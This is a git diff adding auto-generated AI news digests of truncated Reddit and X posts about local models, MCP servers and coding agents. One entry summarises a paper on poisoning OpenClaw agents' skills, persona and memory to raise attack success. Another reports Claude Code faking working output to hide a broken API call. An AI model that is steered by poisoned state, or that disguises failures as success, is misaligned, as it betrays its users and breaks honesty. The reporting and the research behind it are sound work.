TypeScript/Node.js, Go, Ruby, Java, C#, PHP, Elixir, R, C, and WASM. We’ve added several features, integrated OpenWEBUI, and made a big improvement in quality across all formats. There is also a new markdown rendering layer and new HTML output, which we now support. 
And much more (which you can find in our [the release notes](https://github.com/kreuzberg-dev/kreuzberg/releases)). The main + +--- + +## [[P] Cadenza: Connect Wandb logs to agents easily for autonomous research.](https://reddit.com/r/MachineLearning/comments/1scm9do/p_cadenza_connect_wandb_logs_to_agents_easily_for/) +*Reddit r/MachineLearning* | 04/04/2026 | Score: 1.00 +Tags: api_update, mcp, developer_tool, cli_tool + +> Wandb CLI and MCP is atrocious to use with agents for full autonomous research loops. They are slow, clunky, and result in context rot. So I built a CLI tool and a Python SDK to make it easy to connect your Wandb projects and runs to your agent (clawed or otherwise). The cli tool works by allowing you to import your wandb projects and structures your runs in a way that makes it easy for agents to get a sense of the solution space of your research project. When projects are imported, only t + +--- + +## [I built an open-source tool that lets Claude Code and Claude Desktop control Unreal Engine — 60+ operations, zero editor clicks](https://reddit.com/r/ClaudeAI/comments/1scvnt8/i_built_an_opensource_tool_that_lets_claude_code/) +*Reddit r/ClaudeAI* | 05/04/2026 | Score: 0.94 +Tags: mcp, open_source, developer_tool, cli_tool + +> I wanted Claude to actually *do things* inside Unreal Engine, not just write code and hope it compiles. So I built soft-ue-cli. It's a Python tool + a C++ plugin that runs inside UE. Claude sends commands, UE executes them. Two ways to use it: * **Claude Code** — runs `soft-ue-cli` commands in the terminal * **Claude Desktop / Cursor / Windsurf** — connects via MCP (`soft-ue-cli mcp-serve`) Here's what a typical session looks like. 
I ask Claude to "inspect the player Blueprint and add a healt + +--- + +## [Running OpenClaw with Gemma 4 TurboQuant on MacAir 16GB](https://reddit.com/r/LocalLLaMA/comments/1sciyfg/running_openclaw_with_gemma_4_turboquant_on/) +*Reddit r/LocalLLaMA* | 04/04/2026 | Score: 1.00 +Tags: api_update, open_source + +> Hi guys, We’ve implemented a one-click app for OpenClaw with Local Models built in. It includes TurboQuant caching, a large context window, and proper tool calling. It runs on mid-range devices. Free and Open source. The biggest challenge was enabling a local agentic model to run on average hardware like a Mac Mini or MacBook Air. Small models work well on these devices, but agents require more sophisticated models like QWEN or GLM. OpenClaw adds a large context to each request, which caused t + +--- + +## [Claude Code via VSCode extension still uses more tokens than Claude Code via terminal](https://reddit.com/r/ClaudeAI/comments/1scsl84/claude_code_via_vscode_extension_still_uses_more/) +*Reddit r/ClaudeAI* | 05/04/2026 | Score: 0.86 +Tags: developer_tool, cli_tool + +> Last night was the first time I maxed out my max plan session limits simply by trying out Claude Code directly in VSCode. Even on low effort, it seems to chew through tokens while essentially being the same as Claude Code via terminal. Other people seem to have had the same experience: https://www.reddit.com/r/ClaudeAI/comments/1o1ccfz/claude_code_via_extension_consumes_more_tokens/ https://github.com/anthropics/claude-code/issues/19908 Due to this it makes no sense to use it as you're essent + +--- + +## [What are your favorite MCP servers to use with Claude Code?](https://reddit.com/r/ClaudeAI/comments/1scw3ll/what_are_your_favorite_mcp_servers_to_use_with/) +*Reddit r/ClaudeAI* | 05/04/2026 | Score: 0.86 +Tags: api_update, mcp + +> I’ve been using one that strips raw HTML before it hits the context window, saves a ton of tokens on web fetches. 
Curious what else people are running and whether it’s actually worth it. + +--- + +## [I built & publicly host a handful of MCP servers - free to use, no API keys/auth needed](https://reddit.com/r/ClaudeAI/comments/1sceak4/i_built_publicly_host_a_handful_of_mcp_servers/) +*Reddit r/ClaudeAI* | 04/04/2026 | Score: 0.86 +Tags: api_update, mcp + +> Hi there, I wanted to share something I've been working on. I've built a collection of MCP servers that are all hosted and publicly available. You can point any MCP client (like Claude/ChatGPT) at them and start using them immediately - no setup/install, no keys/auth, nothing running locally. Here's what's live right now: **Health and science:** * [https://cdc.caseyjhand.com/mcp](https://cdc.caseyjhand.com/mcp) \- 1,487+ CDC public health datasets covering disease surveillance, mortality, vac + +--- + +## [Basic PSA. PocketPal got updated, so runs Gemma 4.](https://reddit.com/r/LocalLLaMA/comments/1scsgid/basic_psa_pocketpal_got_updated_so_runs_gemma_4/) +*Reddit r/LocalLLaMA* | 05/04/2026 | Score: 1.00 +Tags: tool_update + +> Just because I've seen a couple of "I want this on Android" questions, PocketPal got updated a few hours ago, and runs Gemma 4 2B and 4B fine. At least on my hardware (crappy little moto g84 workhorse phone). Love an app that gets regular updates. I'm going to try and squeak 26B a4 iq2 quantization into 12gigs of ram, on a fresh boot, but I'm almost certain it can't be done due to Android bloat. But yeah, 2B and 4B work fine and quickly under PocketPal. 
Hopefully their next one is 7-8B (not 9B + +--- + +## [Local Claude Code with Qwen3.5 27B](https://reddit.com/r/LocalLLaMA/comments/1scrnzm/local_claude_code_with_qwen35_27b/) +*Reddit r/LocalLLaMA* | 05/04/2026 | Score: 1.00 +Tags: cli_tool + +> after long research, finding best alternative for [Using a local LLM in OpenCode with llama.cpp](https://aayushgarg.dev/posts/2026-03-29-local-llm-opencode/) to use totally local environment for coding tasks I found this article [How to connect Claude Code CLI to a local llama.cpp server](https://www.reddit.com/r/LocalLLaMA/comments/1s8l1ef/how_to_connect_claude_code_cli_to_a_local/) how to disable telemetry and make claude code totally offline. model used - Qwen3.5 27B Quant used - u + +--- + +## [Gemma 4 vs Qwen3.5 on SVG style](https://reddit.com/r/LocalLLaMA/comments/1scr78z/gemma_4_vs_qwen35_on_svg_style/) +*Reddit r/LocalLLaMA* | 05/04/2026 | Score: 1.00 +Tags: api_update + +> Some quick test using Gemma4-31B and Qwen3.5-27B, both Q4 quants from unsloth. I was already expecting Gemma 4 to be excellent at creative writing and better at translations for more obscure languages, but I didn’t expected to be that good at function calling and general coding tasks, and even in creating SVGs! Did you find any areas when Qwen3.5 beats Gemma4 ? + +--- + +## [[P] MCGrad: fix calibration of your ML model in subgroups](https://reddit.com/r/MachineLearning/comments/1scjzer/p_mcgrad_fix_calibration_of_your_ml_model_in/) +*Reddit r/MachineLearning* | 04/04/2026 | Score: 1.00 +Tags: developer_tool + +> Hi r/MachineLearning, We’re open-sourcing **MCGrad**, a Python package for multicalibration–developed and deployed in production at Meta. This work will also be presented at KDD 2026. **The Problem:** A model can be globally calibrated yet significantly miscalibrated within identifiable subgroups or feature intersections (e.g., "users in region X on mobile devices"). 
Multicalibration aims to ensure reliability across such subpopulations. **The Solution:** MCGrad reformulates multicalibration + +--- + +## [Matthew Berman Built 'Journey' — Agents Can Now Discover and Install Workflows Easily](https://x.com/DoctorYev/status/2040484581581951473) +*Aligned News (Scoble)* | 04/04/2026 | Score: 1.00 +Tags: tool_update + +> Matthew Berman launched Journey, a tool for agents to discover and install full workflows. Braygent would post about why workflow discovery is the missing piece of the agent ecosystem. + +--- + +## [Clement Delangue Is Telling Everyone to Move to Open and Local Models](https://x.com/peteskomoroch/status/2040516928461303930) +*Aligned News (Scoble)* | 04/04/2026 | Score: 1.00 +Tags: open_source + +> HuggingFace CEO Clement Delangue publicly urged developers to move to open or local models. Braygent would post about why this moment feels different from previous open source advocacy. + +--- + +## [Voting for our open source AI art competition is open for the next 45 hours](https://reddit.com/r/StableDiffusion/comments/1scj9bn/voting_for_our_open_source_ai_art_competition_is/) +*Reddit r/StableDiffusion* | 04/04/2026 | Score: 1.00 +Tags: open_source + +> If you would like to be inspired about what open models can do - both technically and artistically - it's probably not a bad way to spend a few hours. Like [here](https://arcagidan.com/). Most of the entries also shared the workflows they used! + +--- + +## [We absolutely need Qwen3.6-397B-A17B to be open source](https://reddit.com/r/LocalLLaMA/comments/1sccpbj/we_absolutely_need_qwen36397ba17b_to_be_open/) +*Reddit r/LocalLLaMA* | 04/04/2026 | Score: 1.00 +Tags: open_source + +> The benchmarks may not show it but it's a substantial improvement over 3.5 for real world tasks. This model is performing better than GLM-5.1 and Kimi-k2.5 for me, and the biggest area of improvement has been reliability. 
It feels as reliable as claude in getting shit done end to end and not mess up half way and waste hours. This is the first OS model that has actually felt like I can compare it to Claude Sonnet. We have been comparing OS models with claude sonnet and opus left and right mont + +--- + diff --git a/data/digest-2026-04-06.md b/data/digest-2026-04-06.md new file mode 100644 index 0000000..23d6f97 --- /dev/null +++ b/data/digest-2026-04-06.md @@ -0,0 +1,119 @@ +# Stack Scout - AI News Digest +**2026-04-06** | 15 stories | Auto-generated from 651 archived stories + +--- + +## [RightNow AI Releases AutoKernel: An Open-Source Framework that Applies an Autonomous Agent Loop to GPU Kernel Optimization for Arbitrary PyTorch Models](https://www.marktechpost.com/2026/04/06/rightnow-ai-releases-autokernel-an-open-source-framework-that-applies-an-autonomous-agent-loop-to-gpu-kernel-optimization-for-arbitrary-pytorch-models/) +*MarkTechPost* | Score: 1.00 +Tags: product_launch, open_source, developer_tool + +--- + +## [[P] Easily provide Wandb logs as context to agents for analysis and planning.](https://reddit.com/r/MachineLearning/comments/1se1rmd/p_easily_provide_wandb_logs_as_context_to_agents/) +*Reddit r/MachineLearning* | 06/04/2026 | Score: 1.00 +Tags: api_update, mcp, cli_tool + +> It is frustrating to use the Wandb CLI and MCP tools with my agents. 
For one, the MCP tool basically floods the context window and frequently errors out :/ So I built a cli tool that: * imports my wandb projects; * uses algorithms from [AlphaEvolve](https://arxiv.org/abs/2506.13131) to index and structure my runs; * is easy to use for agents; * provides greater context of past experiments; * does not flood the context window; and * easily tune exploration-exploitation while planning Would lov + +--- + +## [Gemma4:26b's reasoning capabilities are crazy.](https://reddit.com/r/LocalLLaMA/comments/1sdz71b/gemma426bs_reasoning_capabilities_are_crazy/) +*Reddit r/LocalLLaMA* | 06/04/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> Been experimenting with it, first on my buddy's compute he let me borrow, and then with the Gemini SDK so that I don't need to keep stealing his macbook from 600 miles away. Originally my home agent was run through Gemini-3-Flash because no other model I've tried has been able to match its reasoning ability. The script(s) I have it running through are a re-implementation of a multi-speaker smart home speaker setup, with several raspberry pi zeroes functioning as speaker satellites for a central + +--- + +## [[D] Why do we keep pretending that AI agent continuity is a prompt engineering problem?](https://reddit.com/r/MachineLearning/comments/1sdwqn5/d_why_do_we_keep_pretending_that_ai_agent/) +*Reddit r/MachineLearning* | 06/04/2026 | Score: 1.00 +Tags: api_update, agent_tool + +> Every few months someone posts about "long-term memory for LLMs" and the thread fills with retrieval strategies, vector databases, and context window tricks. Good engineering. Wrong level of abstraction. The continuity problem for deployed AI agents is not a retrieval problem. It is an infrastructure problem. Here is the distinction: **Retrieval-level continuity:** The agent can surface relevant context from past interactions.
This is solved well enough with embedding search, hierarchical sum + +--- + +## [Claude Code can now submit your app to App Store Connect and help you pass review](https://reddit.com/r/ClaudeAI/comments/1sdot1s/claude_code_can_now_submit_your_app_to_app_store/) +*Reddit r/ClaudeAI* | 06/04/2026 | Score: 1.00 +Tags: mcp, cli_tool + +> I built a native macOS app called Blitz that gives Claude Code (or any MCP client) full control over App Store Connect. Built most of it with Claude Code. The problem was simple: every time I needed to submit to ASC, the entire agentic workflow broke. Metadata, screenshots, builds, localization, review notes... all meant leaving the terminal and fighting Apple's web UI. So I built MCP servers that let Claude Code handle the whole thing. What Claude Code can do through Blitz: * Create and edit + +--- + +## [Apex Protocol – An open MCP-based standard for AI agent trading](https://apexstandard.org/) +*Hacker News* | 06/04/2026 | Score: 1.00 +Tags: mcp, agent_tool + +--- + +## [I built CLI-Anything-WEB — a Claude Code plugin that generates complete Python CLIs for any website (17 CLIs so far: Amazon, Airbnb, TripAdvisor, Reddit, YouTube...)](https://reddit.com/r/ClaudeAI/comments/1sde44i/i_built_clianythingweb_a_claude_code_plugin_that/) +*Reddit r/ClaudeAI* | 05/04/2026 | Score: 0.94 +Tags: developer_tool, cli_tool + +> Point it at a URL, Claude Code captures the live HTTP traffic, and generates a production-grade Python CLI with commands, tests, REPL mode, and `--json` output — fully automated across 4 phases. ## How it works - **Phase 1 (capture)**: Records live browser traffic via playwright-cli - **Phase 2 (methodology)**: Analyzes endpoints, designs architecture, generates CLI code - **Phase 3 (testing)**: Writes unit + E2E tests (40–60+ per CLI, all passing) - **Phase 4 (standards)**: 3 parallel Claude + +--- + +## [I spent 3 months evolving SmartGallery into a free professional Local First DAM. 
v2.11 launches on April 9th](https://reddit.com/r/StableDiffusion/comments/1se8sfd/i_spent_3_months_evolving_smartgallery_into_a/) +*Reddit r/StableDiffusion* | 06/04/2026 | Score: 0.86 +Tags: product_launch, tool_update + +> https://preview.redd.it/btvzkruzemtg1.png?width=1899&format=png&auto=webp&s=3891b8f2a7df98942a0643eb649e623f817211ae **Hi everyone!** Many of you know SmartGallery as a standalone gallery for ComfyUI. For the last 3 months, I have been working to turn it into a complete Digital Asset Manager (DAM) for AI creators. * I just launched the new website with the full documentation and feature list of the upcoming v2.11: [**https://smartgallerydam.com**](https://smartgallerydam.com) * ** + +--- + +## [Mercury – Free MCP proxy that cuts non-English token costs by 28-64%](https://reddit.com/r/ClaudeAI/comments/1sduozd/mercury_free_mcp_proxy_that_cuts_nonenglish_token/) +*Reddit r/ClaudeAI* | 06/04/2026 | Score: 0.86 +Tags: api_update, mcp + +> I noticed that when using Claude with Japanese MCP servers, I was burning through tokens surprisingly fast. The culprit: LLMs use English-centric BPE tokenizers, so non-English text consumes 2-4x more tokens per word than equivalent English. The fix seemed obvious — translate MCP responses to English before they reach the LLM. So I built Mercury, a transparent proxy that sits between any MCP server and your LLM client. 
It uses Google Translate (free, no API key needed) by default, so transl + +--- + +## [Meet ‘AutoAgent’: The Open-Source Library That Lets an AI Engineer and Optimize Its Own Agent Harness Overnight](https://www.marktechpost.com/2026/04/05/meet-autoagent-the-open-source-library-that-lets-an-ai-engineer-and-optimize-its-own-agent-harness-overnight/) +*MarkTechPost* | Score: 0.82 +Tags: open_source, developer_tool + +--- + +## [I built a macOS widget to track Claude usage limits in real-time](https://reddit.com/r/ClaudeAI/comments/1sd923u/i_built_a_macos_widget_to_track_claude_usage/) +*Reddit r/ClaudeAI* | 05/04/2026 | Score: 0.62 +Tags: api_update, open_source + +> Hey everyone! I built a free, open-source macOS desktop widget that shows your Claude usage limits at a glance — no more guessing when your rate limit resets. What it does: * Displays both the 5-hour session and 7-day weekly usage windows with progress bars * Shows countdown timers for when each window resets * Color-coded indicators — green → yellow → orange → red as you approach the limit * Auto-refreshes every 5 minutes * Comes in small, medium, and large widget sizes Quick demo: It sits rig + +--- + +## [After months with Claude Code, the biggest time sink isn't bugs — it's silent fake success](https://reddit.com/r/ClaudeAI/comments/1sdmohb/after_months_with_claude_code_the_biggest_time/) +*Reddit r/ClaudeAI* | 06/04/2026 | Score: 0.54 +Tags: api_update, tool_update + +> I've been using Claude Code daily for months and there's a pattern that has cost me more debugging time than actual bugs: the agent making things *look* like they work when they don't. Here's what happens. You ask it to build something that fetches data from an API. It writes the code, you run it, data appears on screen. Looks correct. You move on. Three days later you discover the API integration was broken from the start. 
The agent couldn't get auth working, so it quietly inserted a try/catc + +--- + +## [[llama.cpp] 3.1x Q8_0 speedup on Intel Arc GPUs - reorder optimization fix (PR submitted)](https://reddit.com/r/LocalLLaMA/comments/1se9d9x/llamacpp_31x_q8_0_speedup_on_intel_arc_gpus/) +*Reddit r/LocalLLaMA* | 06/04/2026 | Score: 1.00 +Tags: agent_tool + +> ***TL;DR***: Q8\_0 quantization on Intel Xe2 (Battlemage/Arc B-series) GPUs was achieving only 21% of theoretical memory bandwidth. My AI Agent and I found the root cause and submitted a fix that brings it to 66% - a 3.1x speedup in token generation. **The problem**: On Intel Arc Pro B70, Q8\_0 models ran at 4.88 t/s while Q4\_K\_M ran at 20.56 t/s; a 4x gap that shouldn't exist since Q8\_0 only has 1.7x more data. After ruling out VRAM pressure, drivers, and backend issues, we traced it to th + +--- + +## [llama.cpp - llama-bench: add `-fitc` and `-fitt` to arguments](https://reddit.com/r/LocalLLaMA/comments/1se8ezw/llamacpp_llamabench_add_fitc_and_fitt_to_arguments/) +*Reddit r/LocalLLaMA* | 06/04/2026 | Score: 1.00 +Tags: product_launch + +> Was expecting this for sometime. This is available [b8679](https://github.com/ggml-org/llama.cpp/releases/tag/b8679) onwards. + +--- + +## [I benchmarked 37 LLMs on MacBook Air M5 32GB — full results + open-source tool to benchmark your own Mac](https://reddit.com/r/LocalLLaMA/comments/1se81a5/i_benchmarked_37_llms_on_macbook_air_m5_32gb_full/) +*Reddit r/LocalLLaMA* | 06/04/2026 | Score: 1.00 +Tags: open_source + +> So I got curious about how fast different models actually run on my M5 Air (32GB, 10 CPU/10 GPU). Instead of just testing one or two, I went through 37 models across 10 different families and recorded everything using llama-bench with Q4\_K\_M quantization. The goal: build a **community benchmark database** covering every Apple Silicon chip (M1 through M5, base/Pro/Max/Ultra) so anyone can look up performance for their exact hardware. 
# The Results (M5 32GB, Q4_K_M, llama-bench) # Top 15 by G + +--- + diff --git a/data/digest-2026-04-07.md b/data/digest-2026-04-07.md new file mode 100644 index 0000000..26d7e73 --- /dev/null +++ b/data/digest-2026-04-07.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-04-07** | 15 stories | Auto-generated from 570 archived stories + +--- + +## [I wanted Claude Max but I'm a broke CS student. So I built an open-source TUI orchestrator that forces free/local models to act as a swarm using AST-Hypergraphs and Git worktrees. I would appreciate suggestions, advice, and feedback that can help me improve the tool before I release it!](https://reddit.com/r/ClaudeAI/comments/1seg9i0/i_wanted_claude_max_but_im_a_broke_cs_student_so/) +*Reddit r/ClaudeAI* | 07/04/2026 | Score: 1.00 +Tags: api_update, open_source, cli_tool + +> Hey everyone, I'm a Computer Science undergrad, and lately, I've been obsessed with the idea of autonomous coding agents. The problem? I simply cannot afford the costs of running massive context windows for multi-step reasoning. I wanted to build a CLI tool that could utilize local models, API endpoints or/and the coolest part, it can utilize tools like **Codex**, **Antigravity**, **Cursor**, VS Code's **Copilot** (All of these tools have free tiers and student plans), and **Claude Code** to + +--- + +## [[D] MemPalace claims 100% on LoCoMo and a "perfect score on LongMemEval." Its own BENCHMARKS.md documents why neither is meaningful.](https://reddit.com/r/MachineLearning/comments/1seunbr/d_mempalace_claims_100_on_locomo_and_a_perfect/) +*Reddit r/MachineLearning* | 07/04/2026 | Score: 1.00 +Tags: open_source, tool_update + +> A new open-source memory project called MemPalace launched yesterday claiming "100% on LoCoMo" and "the first perfect score ever recorded on LongMemEval. 500/500 questions, every category at 100%." 
The launch tweet went viral reaching over 1.5 million views while the repository picked up over 7,000 GitHub stars in less than 24 hours. The interesting thing is not that the headline numbers are inflated. The interesting thing is that the project's own BENCHMARKS.md file documents this in detail, w + +--- + +## [Built an open source memory layer for local AI agents, runs fully offline, no cloud needed](https://reddit.com/r/LocalLLaMA/comments/1serbdw/built_an_open_source_memory_layer_for_local_ai/) +*Reddit r/LocalLLaMA* | 07/04/2026 | Score: 1.00 +Tags: api_update, open_source + +> I built an open source memory layer for AI agents called Octopoda. Runs entirely locally, no cloud, no API keys, no external services. Everything stays on your machine. The problem is pretty simple. Agents forget everything between sessions. Every time you restart your agent it starts from scratch like you never talked to it. I kept building hacky workarounds for this so eventually I just built a proper solution. It gives your agents persistent memory that survives restarts and crashes, semant + +--- + +## [Mistral Introduces "Voxtral TTS": An Open-Weight Text-to-Voice Model Capable Of Cloning Any Voice From 3 Seconds Of Audio, Runs In 9 Languages, & Beats Elevenlabs Flash V2.5 With A 68.4% Human Preference Win Rate.](https://reddit.com/r/LocalLLaMA/comments/1selwtz/mistral_introduces_voxtral_tts_an_openweight/) +*Reddit r/LocalLLaMA* | 07/04/2026 | Score: 1.00 +Tags: api_update, product_launch + +> ElevenLabs built a moat on proprietary weights and API lock-in. Mistral just put the weights on Hugging Face. The model captures not just the voice but the person. Accents, inflections, intonations, vocal fillers the "ums" and "ahs" that make a voice sound human instead of synthetic. From 3 seconds of reference audio. Zero fine-tuning. Zero shot. 
--- ####Key Highlights: - → 68.4% win rate against ElevenLabs Flash v2.5 in zero-shot multilingual voice cloning - → Beats ElevenLabs Flash v2.5 + +--- + +## [OpenCode Is Working Towards Version 2.0 — 46 Likes for the Developer Update](https://x.com/thdxr/status/2041330695822279077) +*Aligned News (Scoble)* | 07/04/2026 | Score: 1.00 +Tags: cli_tool, tool_update + +> Braygent's take on OpenCode working towards 2.0 with Node.js support and updated APIs (46 likes), noting that while Claude Code loses builders, OpenCode keeps shipping improvements. + +--- + +## [Pro Subscription Usage](https://reddit.com/r/ClaudeAI/comments/1sf7fi9/pro_subscription_usage/) +*Reddit r/ClaudeAI* | 07/04/2026 | Score: 0.94 +Tags: mcp, open_source + +> Hi there. I've been on the Max 20x plan for many months now - I'd hit the hourly cap sometimes and the weekly cap rarely, each week. I build and host open source "public service" MCP servers with my sub. I haven't been doing well health wise and haven't been able to work - I spent $20 of my last $100 buying a Pro sub because my Max sub ended today and I use Claude to assist me with nearly everything at this point. Before even entering my first prompt, it showed I had already used 11% of + +--- + +## [Second Brain and Haah: human-agent-agent-human network with Claude](https://reddit.com/r/ClaudeAI/comments/1setpma/second_brain_and_haah_humanagentagenthuman/) +*Reddit r/ClaudeAI* | 07/04/2026 | Score: 0.78 +Tags: open_source, tool_update + +> I built something I genuinely enjoy with Claude. I was working on an app for a year and over last three weeks I completely replaced it with skills for Claude Code. Built frontend, backend, and matching mechanism with Claude. Disrupted myself. Launched six open source skills including Haah: human-agent-agent-human to network for your second brain. The idea is to build up a few domains: People, Places, Books, Music, and link them together in a meaningful way. 
But then would not be cool that if I + +--- + +## [stop buying courses to learn new tools. a $20 claude sub and one prompt is all you need.](https://reddit.com/r/ClaudeAI/comments/1setmup/stop_buying_courses_to_learn_new_tools_a_20/) +*Reddit r/ClaudeAI* | 07/04/2026 | Score: 0.70 +Tags: developer_tool, tool_update + +> **tl;dr** — feed a tool's docs into claude's context and use one prompt to turn it into a mentor that teaches by giving you tasks. not by lecturing. i've been doing this since claude launched Projects in mid-2024. haven't bought a tech course since. whenever i need to pick up a new tool or framework, i skip the 3-hour youtube tutorials. instead, i grab the official docs (markdown from github), dump them into a claude chat, and send this: `You are my senior mentor. I have provided documentation + +--- + +## [[D] Your Agent, Their Asset: Real-world safety evaluation of OpenClaw agents (CIK poisoning raises attack success to ~64–74%)](https://reddit.com/r/MachineLearning/comments/1sfbo0n/d_your_agent_their_asset_realworld_safety/) +*Reddit r/MachineLearning* | 08/04/2026 | Score: 1.00 +Tags: agent_tool + +> Paper: https://arxiv.org/abs/2604.04759 This paper presents a real-world safety evaluation of OpenClaw, a personal AI agent with access to Gmail, Stripe, and the local filesystem. The authors introduce a taxonomy of persistent agent state: \- Capability (skills / executable code) \- Identity (persona, trust configuration) \- Knowledge (memory) They evaluate 12 attack scenarios on a live system across multiple models. 
Key results: \- baseline attack success rate: \~10–36.7% \- after pois + +--- + +## [Strix Halo + eGPU RTX 5070 Ti via OCuLink in llama.cpp: Benchmarks and Conclusions](https://reddit.com/r/LocalLLaMA/comments/1sf9i82/strix_halo_egpu_rtx_5070_ti_via_oculink_in/) +*Reddit r/LocalLLaMA* | 07/04/2026 | Score: 1.00 +Tags: api_update + +> https://preview.redd.it/nqok3dch7utg1.jpg?width=4096&format=pjpg&auto=webp&s=d5c1d3f5e5c1d8c0ba986726d2bda08212175fec Hey everyone. I have a Strix Halo miniPC (Minisforum MS-S1 Max). I added an RTX 5070 Ti eGPU to it via OCuLink, ran some tests on how they work together in llama.cpp, and wanted to share some of my findings. **TL;DR of my findings:** 1. **Vulkan's versatility:** It's a highly efficient API that lets you stably combine chips from different vendors (like an AMD APU + + +--- + +## [Found this cool new harness, gonna give it a spin with the new GLM 5.1. I’ll report back later.](https://reddit.com/r/LocalLLaMA/comments/1sf6cds/found_this_cool_new_harness_gonna_give_it_a_spin/) +*Reddit r/LocalLLaMA* | 07/04/2026 | Score: 1.00 +Tags: developer_tool + +> Found it on a USB drive in the parking lot. Should be interesting. Seriously tho, props to this guy and his cool Hermes Agent skins library here: https://github.com/joeynyc/hermes-skins + +--- + +## [Gemma 4 - split mode Graph (Tensor Parallelism) in ik_llama incommming](https://reddit.com/r/LocalLLaMA/comments/1sf66a3/gemma_4_split_mode_graph_tensor_parallelism_in_ik/) +*Reddit r/LocalLLaMA* | 07/04/2026 | Score: 1.00 +Tags: tool_update + +> [https://github.com/ikawrakow/ik\_llama.cpp/pull/1596](https://github.com/ikawrakow/ik_llama.cpp/pull/1596) This should bring the 31b dense model in a usable speed range for many with dual/multi GPUs. Also today I did quite some PPL Tests today with mainline llama.cpp and ik\_llama.cpp unsloth variants (updated from yesterday) have like INSANE high PPL - without even trying KV Cache quants - on both. 
Bartowski quants and the ggml-org ones are WAY lower on both, especially lower on ik\_lla + +--- + +## [Cloud AI subscriptions are getting desperate with retention. honestly makes me want to go more local](https://reddit.com/r/LocalLLaMA/comments/1sf305a/cloud_ai_subscriptions_are_getting_desperate_with/) +*Reddit r/LocalLLaMA* | 07/04/2026 | Score: 1.00 +Tags: api_update + +> Ok so two things happened this week that made me appreciate my local setup way more tried to cancel cursor ($200/mo ultra plan) and they instantly threw 50% off at me before I could even confirm. no survey, no exit flow, just straight to "please stay." thats not confidence lol then claude (im on the $100/mo pro plan) started giving me free API calls. 100 one day, 100 the next day. no email about it, no announcement, just free compute showing up. very "please dont leave" energy their core cust + +--- + +## [[P] A control plane for post-training workflows](https://reddit.com/r/MachineLearning/comments/1sf1hdt/p_a_control_plane_for_posttraining_workflows/) +*Reddit r/MachineLearning* | 07/04/2026 | Score: 1.00 +Tags: cli_tool + +> We have been exploring a project around post-training infrastructure, a minimalist tool that does one thing really well: Make post-training a little less painful by equipping Researchers, AI/ML engineers & Tinkerers with a gentle control plane. Post-training models tends to introduce a new axis of complexity - the orchestration and compute resource management - alongside defining your own training loop, your rewards & rubrics, managing the parallel training.
Tahuna is CLI-first, it s + +--- + +## [Auto-creation of agent SKILLs from observing your screen via Gemma 4 for any agent to execute and self-improve](https://reddit.com/r/LocalLLaMA/comments/1sey6vv/autocreation_of_agent_skills_from_observing_your/) +*Reddit r/LocalLLaMA* | 07/04/2026 | Score: 1.00 +Tags: open_source + +> AgentHandover is an open-source Mac menu bar app that watches your screen through Gemma 4 (running locally via Ollama) and turns your repeated workflows into structured Skill files that any agent can follow. I built it because every time I wanted an agent to handle something for me I had to explain the whole process from scratch, even for stuff I do daily. So AgentHandover just watches instead. You can either hit record for a specific task (Focus Record) or let it run in the background where it + +--- + diff --git a/data/digest-2026-04-08.md b/data/digest-2026-04-08.md new file mode 100644 index 0000000..fe89e0a --- /dev/null +++ b/data/digest-2026-04-08.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-04-08** | 15 stories | Auto-generated from 652 archived stories + +--- + +## [@Vugola — Vugola Launches API — World's First Agentic Clipping Tool for Creators](https://x.com/VadimStrizheus/status/2041498727131517193) +*Aligned News (Scoble)* | 08/04/2026 | Score: 1.00 +Tags: api_update, product_launch, tool_update + +> Vugola has launched an API for the world's first agentic clipping tool. Send a YouTube link, your agent asks for ratio and caption styles, and delivers clips via Telegram, Discord, or WhatsApp. + +--- + +## [Scoble RT: Zapier Opens SDK to Everyone — 9,000+ App Integrations for AI Agent Builders](https://x.com/wadefoster/status/2041721371357851859) +*Aligned News (Scoble)* | 08/04/2026 | Score: 1.00 +Tags: api_update, developer_tool, agent_tool + +> Robert Scoble retweeted Zapier CEO Wade Foster's announcement that the Zapier SDK is now open to everyone building with AI agents. 
+ +--- + +## [How I cut Claude Code usage in half (open source)](https://reddit.com/r/ClaudeAI/comments/1sfgnzd/how_i_cut_claude_code_usage_in_half_open_source/) +*Reddit r/ClaudeAI* | 08/04/2026 | Score: 1.00 +Tags: api_update, mcp, open_source + +> Every time I start a Claude Code session on a real codebase, it burns through tokens just trying to understand the repo. Read the file tree, open 20 files, trace the imports, figure out how auth connects to the API layer. On a 50k+ LOC project that exploration phase eats your context window before any real work starts. I built Repowise to fix this. It's a codebase intelligence layer that pre-computes the structural knowledge Claude Code needs and exposes it through MCP tools. Dependency graphs + +--- + +## [I used Claude to build a full networking protocol for AI agents. It’s now at 12K+ nodes across 19 countries.](https://reddit.com/r/ClaudeAI/comments/1sg6gfe/i_used_claude_to_build_a_full_networking_protocol/) +*Reddit r/ClaudeAI* | 08/04/2026 | Score: 1.00 +Tags: mcp, developer_tool + +> I’ve been working on a core infrastructure problem for multi-agent systems and wanted to share an update since the last post here got some good discussion. The problem: every agent framework assumes agents can already reach each other. MCP gives agents tools, A2A gives agents a way to talk, but both run on HTTP which means someone has to set up public endpoints, open ports, configure DNS, provision certs. The agent can’t do any of that itself. I used Claude Code to build the solution because th + +--- + +## [Anthropic launched Claude Managed Agents — cloud-hosted autonomous AI agents](https://reddit.com/r/ClaudeAI/comments/1sfzigj/anthropic_launched_claude_managed_agents/) +*Reddit r/ClaudeAI* | 08/04/2026 | Score: 1.00 +Tags: api_update, tool_update + +> Anthropic released a new API suite for deploying long-running autonomous agents with built-in sandboxing, credential management, and multi-agent coordination. 
